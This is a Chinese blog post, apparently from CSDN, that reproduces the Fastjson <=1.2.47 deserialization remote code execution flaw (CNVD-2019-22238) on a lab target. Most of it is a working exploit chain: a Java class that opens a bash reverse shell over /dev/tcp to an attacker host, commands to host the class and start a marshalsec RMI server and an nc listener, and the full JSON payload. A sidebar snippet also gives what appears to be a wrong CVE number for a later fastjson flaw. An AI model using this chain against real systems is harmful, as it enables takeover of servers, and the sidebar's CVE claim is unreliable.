Fastjson<1.2.48远程代码执行漏洞(CNVD-2019-22238)

最新推荐文章于 2024-03-10 17:06:04 发布
最新推荐文章于 2024-03-10 17:06:04 发布
阅读量2k 收藏 5
点赞数 3
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/109429845
版权

1、漏洞详情
Fastjson 存在反序列化远程代码执行漏洞,当应用或系统使用 Fastjson 对由用户可控的 JSON 字符串数据进行解析时,将可能导致远程代码执行的危害。
2、影响版本
fastjson <= 1.2.47
漏洞利用
1、编写一个反弹shell脚本Exploit.java,并编译生成Exploit.class。

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.118.1/8002 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

通过python命令放到外网环境中,默认监听端口8000。
Python2 :python2 -m SimpleHTTPServer 8000
Python3 :python3 -m http.server 8000

在这里插入图片描述

3.借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.138.118.1:8000/#Exploit” 9999

在这里插入图片描述

4、接着开启nc监听端口8002:nc -lvvp 8002

在这里插入图片描述

5、通过BurpSuite抓包
在这里插入图片描述

在这里插入图片描述

变更请求方式,构造payload,向靶场发送Payload:
POST / HTTP/1.1
Host: 靶机ip:8090
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 267

{
“a”:{
“@type”:“java.lang.Class”,
“val”:“com.sun.rowset.JdbcRowSetImpl”
},
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://攻击机ip:9999/Exploit”,
“autoCommit”:true
}
}

6、反弹shell
可以看到RMI服务器那边,远程执行成功
在这里插入图片描述

再看BurpSuite响应包也返回了
在这里插入图片描述

看一下nc,成功反弹shell
在这里插入图片描述

PS:注意一下端口。哪个端口是干什么的要清楚。

Lin冲啊
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
fastjson-1.2.48.jar
05-09
com.alibaba.fastjson.JSONObject(JAR包)下载 ,jar包含了json的转换和使用
fastjson反序列化漏洞
最新发布
2401_84466336的博客
06-03 762
也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。之前看过fastjson作者的一篇文章,阿里的一个大佬,能够独立完成一个框架属实真的tql,fastjson连续好几年都被爆出漏洞,作者也是春节也忙着修复,可能这就是一份乐趣和成就感吧。那就正好一起来看当时如何利用fastjson的,应该是个非预期吧,其实这个虽然说是ctf题目,但环境属实和实战没有区别,swagger-ui.html的fastjson
cnvd_2019_22238
qq_59350385的博客
07-12 480
Fastjson 是Alibaba的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。相信利用过Fastjson漏洞的XDM都知道,该漏洞利用需要编写Java利用代码,然后在编译为class文件,在通过rmi/ladp等远程加载实现漏洞利用url:Vulfocus 漏洞威胁分析平台 本地需要安装java环境,启动JNDI-Injection-Exploit-1.0-SNAPSHOT-all
FastJson 1.2.48的 bug
joez的专栏
05-27 927
FastJson 新版1.2.48版的 bugfastjson bug 老有莫名的 bug 出现,如下代码:     @Test public void testJsonParser() throws IOException { InnerTemplateExecuteContext ctx=new InnerTemplateExecuteContext(); ...
fastjson CNVD-2019-22238 远程代码执行漏洞
读书 买花 长大
05-19 467
CNVD-2019-22238
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
**Fastjson 1.2.69 反序列化远程代码执行漏洞详解** Fastjson 是阿里巴巴开源的一个高性能的 JSON 库,广泛应用于 Java 开发中,用于 JSON 的序列化和反序列化操作。然而,Fastjson 1.2.69 版本存在一个严重的反序...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
首先,我们要理解什么是远程代码执行漏洞。在计算机安全领域,RCE漏洞允许攻击者在没有权限的情况下,在目标系统上执行任意代码。这种漏洞往往具有极高的危险性,因为它可能导致数据泄露、系统瘫痪甚至完全控制目标...
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
fastjson-1.2.49
08-09
fastjson是由阿里巴巴提供的,fastJson对于json格式字符串的解析主要用到了一下三个类: JSONfastJson的解析器,用于JSON格式字符串与JSON对象及javaBean之间的转换。 JSONObject:fastJson提供的json对象。 JSONArray:fastJson提供json数组对象
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
weixin_45260839的博客
08-12 740
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
CNVD-2019-22238Fastjson 1.2.47 反序列化漏洞复现
冬的博客
03-16 2139
Fastjson 存在反序列化远程代码执行漏洞,当应用或系统使用 Fastjson 对由用户可控的 JSON 字符串数据进行解析时,将可能导致远程代码执行的危害。
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
Boom!脑洞大爆炸的博客
07-07 788
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
vulfocus/fastjson-cnvd_2019_22238漏洞复现(docker)附问题解决方案
weixin_63139305的博客
03-10 1803
完整的复现过程,每一步的原理都很详细。使用vulhub的docker,没有使用在线的vulfocus因为连接太不稳定了
Fastjson漏洞学习——CNVD-2019-22238复现
记录并分享学习安全的知识点..
05-09 1039
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、概述 Fastjson是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 二、影响版本 Fastjson < 1.2.68 ...
Fastjson远程代码执行(CNVD-2019-22238)漏洞复现
慢就是快
12-31 5239
文章目录0x00 漏洞简介0x02 影响版本0x03 漏洞复现0x03 指纹识别0x04 注意事项0x05 漏洞修复 0x00 漏洞简介 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 0x01 漏洞详情 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象 Fastjson提供了autotype功能,允许用户在反序列化数据
Fastjson =1.2.47反序列化RCE漏洞CNVD201922238
king丶
08-21 1509
**Fastjson <=1.2.47反序列化RCE漏洞CNVD201922238) ** **一、漏洞描述 ** Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列 化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法
fastjson< 1.2.69远程代码执行漏洞cve编号
01-04
fastjson< 1.2.69远程代码执行漏洞的CVE编号是CVE-2021-21351。该漏洞源于fastjson在处理JSON数据时存在安全漏洞,攻击者可以通过精心构造的JSON数据来实现远程代码执行,从而对系统进行攻击。 漏洞的产生主要是由于fastjson在处理反序列化时存在漏洞,攻击者可以通过构造恶意的JSON数据来触发fastjson的反序列化过程,最终实现执行恶意代码的目的。由于fastjson是非常常见的JSON解析库,因此该漏洞可能影响许多使用fastjson的应用程序。 为了防范这一漏洞,建议及时更新fastjson至最新版本,并且在使用fastjson解析JSON数据时,对输入的数据进行严格的验证和过滤,避免恶意JSON数据的注入。此外,也应加强系统安全意识教育,及时关注官方的安全公告,并且注意其他安全防护措施,以保护系统免受漏洞的攻击。 总之,CVE-2021-21351是一个比较严重的远程代码执行漏洞,对系统的安全性造成了潜在威胁。我们应该保持警惕,及时采取相应的安全防护措施,以确保系统的安全。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值